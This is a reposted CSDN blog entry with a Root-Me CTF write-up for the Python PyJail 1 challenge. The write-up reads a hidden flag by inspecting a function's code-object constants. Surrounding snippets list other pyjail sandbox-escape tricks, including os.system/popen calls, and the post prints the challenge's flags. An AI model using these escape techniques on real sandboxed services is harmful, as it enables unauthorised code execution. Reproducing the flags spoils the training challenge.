CTF-rootme 题解之 Python - PyJail 1

最新推荐文章于 2024-04-24 17:57:47 发布
最新推荐文章于 2024-04-24 17:57:47 发布
阅读量1.9k 收藏 2
点赞数
文章标签: python 运维
原文链接:http://www.cnblogs.com/heycomputer/articles/10539202.html
版权
本文介绍了如何解决RootMe平台上的CTF挑战Python PyJail 1。通过ssh连接到服务器,利用Python的inspect模块获取exit函数的code对象,进一步揭示常量信息,最终获取到flag。
摘要由CSDN通过智能技术生成

Link:https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-1

Reference:https://docs.python.org/2/library/inspect.html?highlight=func_code

Solution: 

[ BlackArch ~ ]# ssh -p 2222 app-script-ch8@challenge02.root-me.org
      _           _ _                        ___ ____  
  ___| |__   __ _| | | ___ _ __   __ _  ___ / _ \___ \
 / __| '_ \ / _` | | |/ _ \ '_ \ / _` |/ _ \ | | |__) |
| (__| | | | (_| | | |  __/ | | | (_| |  __/ |_| / __/
 \___|_| |_|\__,_|_|_|\___|_| |_|\__, |\___|\___/_____|
                                 |___/ root-me.org     

app-script-ch8@challenge02.root-me.org's password:
Permission denied, please try again.
app-script-ch8@challenge02.root-me.org's password:
Welcome to my Python sandbox! Everything is in exit() function (arg == get the flag!)
>>> print exit.func_code
<code object exit at 0xb7d87b60, file "/challenge/app-script/ch8/ch8.py", line 27>
>>> print exit.func_code.co_consts
(None, 'flag-WQ0dSFrab3LGADS1ypA1', -1, 'cat .passwd', 'You cannot escape !')
>>> exit(exit.func_code.co_consts[1])
Well done flag : YjHRUZEa9irCPS2llubR
Connection to challenge02.root-me.org closed.

28.13.1. Types and members

The

最低0.47元/天 解锁文章
weixin_30276935
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-rootme 题解Python - PyJail 2
weixin_30640291的博客
03-15 723
LINK:https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-2e Reference:http://n3k0sec.top/2018/04/15/root-me-App-Script/ Solution: [ BlackArch ~ ]# ssh -p 2222 app-script-ch9@challenge02...
BugkuCTF-Crypto题python_jail
am_03的博客
08-27 868
题目可通过nc远程连接 输入nc建立连接 测试发现最多只能输入10个字符,要想有输出,需要print() (7个字符) 若print(flag)则有11个字符,超出限制,报错 可利用python里help()函数,借报错信息带出flag变量值内容,help(flag) 刚好10个字符 ...
bugku crypto-python_jail
weixin_46578840的博客
08-22 610
启动场景后得到nc ip+端口号 连上之后发现print flag会报错 而且经过测试只能传入10个字符多了就会报错 那就不能用print 利用python中help()函数,借报错信息带出flag变量值内容, 刚好10个字符
BugKu_python_jail
Kobalos的博客
08-24 766
看到提示了nc 114.67.246.176 13828 在终端连接nc 这时候看到了描述中的提示,flag在flag变量里面! 尝试打印flag变量 发现他报错了,再尝试下任意打印一个字符串试一下 任意输入的字符a被成功打印,猜测应该是对输入的长度进行限制 打印“aa”又报错了,猜测输入的字符长度应该被限制在10以内 这时候想到help函数,借助报错信息应该可以带出flag 成功得到flag! ...
Python Jail 沙盒逃逸 合集
Jay17的博客
08-22 3668
Python Jail 沙盒逃逸 合集
pyjail初了解
Aiwin的博客
05-30 2261
pyjail初了解
ctf-all-in-one
01-30
ctf-all-in-one
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
AppJailLauncher:适用于 Windows 8 及更高版本的 CTF 挑战“框架”
07-12
应用越狱启动器 支持的操作系统 由于 AppJailLauncher 需要 Windows 上的 AppContainer 功能,这限制了对 Windows 8 及更高版本的支持。 测试平台 Windows 8.1 Update 1 x64(带有 Visual Studio 2013 Professional) 写作挑战 确保setvbuf(stdout, NULL, _IONBF, 0); 叫做。
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
CTF-rootme 题解之PYC - ByteCode
weixin_30437847的博客
03-17 471
LINK:https://www.root-me.org/en/Challenges/Cracking/PYC-ByteCode 使用Pyc的逆向脚本uncompyle6进行反编译,该逆向脚本内容如下: #!/usr/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'uncompyle6==3.2.4','console_scripts','unco...
python 重定向 ctf_CTF python沙箱逃逸进阶题目
weixin_39578674的博客
12-10 278
future引用了python3的新特性,所以是不能直接回回显,得用printfile函数可以读取。print(().__class__.__bases__[0].__subclasses__()[40]('./sx2.py').read())读取源码后:from __future__ import print_functionbanned = ["import","exec","eval","p...
【西电Moectf2023-Jail-WP】
qq_33295410的博客
09-27 2714
它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出。设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。手动在终端输入是不行的,需要使用脚本提交,贴上代码。
CTF MISC在我眼里各种奇奇怪怪的题学习思路总结(持续更新)
超大青花鱼的博客
09-18 763
这一篇主要记录我遇到的我以前没见过也没想过的题,总之奇奇怪怪的知识又增加了。
【Web】随便写写的pyjail刷题记录(1)
最新发布
uuzeray的博客
04-24 1000
Python中内置了一个名为breakpoint()的函数,在Python 3.7中引入,用于在调试模式下设置断点。使用breakpoint()函数会停止程序的执行,并在IDE或命令行中进入调试模式,可以单步执行程序,查看变量的值等。符号通常被用于 Jupyter Notebook 或类似的交互式环境中,用来执行系统命令,而help()正是个能交互式的界面。在python2中,input函数从标准输入接收输入,并且自动eval求值,返回求出来的值。拿到backdoor的key,而后便可为所欲为。
python沙盒逃逸
weixin_30938149的博客
10-08 263
前言 最近遇到了很多python沙盒逃逸的题目(不知道是不是因为现在python搭的站多了……),实际使用时发现只会复制别人的payload是不够用的,于是自己来总结一波(顺带一提python沙盒逃逸的英文似乎是pyjail……) 姿势 os import os os.system('dir') os.popen('dir').read() platform import platform pla...
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值